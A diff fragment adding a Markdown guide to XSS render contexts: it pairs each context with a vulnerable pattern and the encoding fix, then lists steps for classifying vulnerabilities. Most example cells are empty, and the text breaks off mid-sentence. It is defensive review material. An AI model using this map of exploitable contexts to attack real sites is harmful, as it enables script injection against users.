+|---------|---------|-------------------|
+| `HTML_BODY` | `{{ v }}` | HTML entity encode `<>&"'` |
+| `HTML_ATTR_QUOTED` | `` | HTML attr encode |
+| `HTML_ATTR_UNQUOTED` | `` | Almost impossible to safely encode; quote the attr |
+| `URL_ATTR` (href/src) | `` | Validate scheme allowlist + attr encode |
+| `JAVASCRIPT_STRING` | `` | JS string escape + ensure quote consistency |
+| `JAVASCRIPT_BLOCK` | `` | DON'T — refactor; no safe encoding |
+| `CSS_VALUE` | `` | CSS encode + allowlist scheme/format |
+| `CSS_BLOCK` | `` | DON'T — refactor |
+| `JSON_RESPONSE` (consumed by JS) | `JSON.parse(response)` | JSON encode + correct content-type header |
+| `EVENT_HANDLER` | `` | JS string escape *inside* HTML attr encode |
+| `URL_PATH` (router-driven) | route param echoed unencoded | URL-encode + HTML-encode |
+| `DOM_INNERHTML` | `el.innerHTML = v` (DOM XSS) | Use `textContent` instead, or DOMPurify |
+| `DOM_DOC_WRITE` | `document.write(v)` | DON'T — refactor |
+
+When you classify:
+1. Identify the render context where user input lands
+2. Identify the encoding applied
+3. Mismatch = vulnerable. Even "HTML encoded" output in
+   `JAVASCRIPT_STRING` is exploitable (`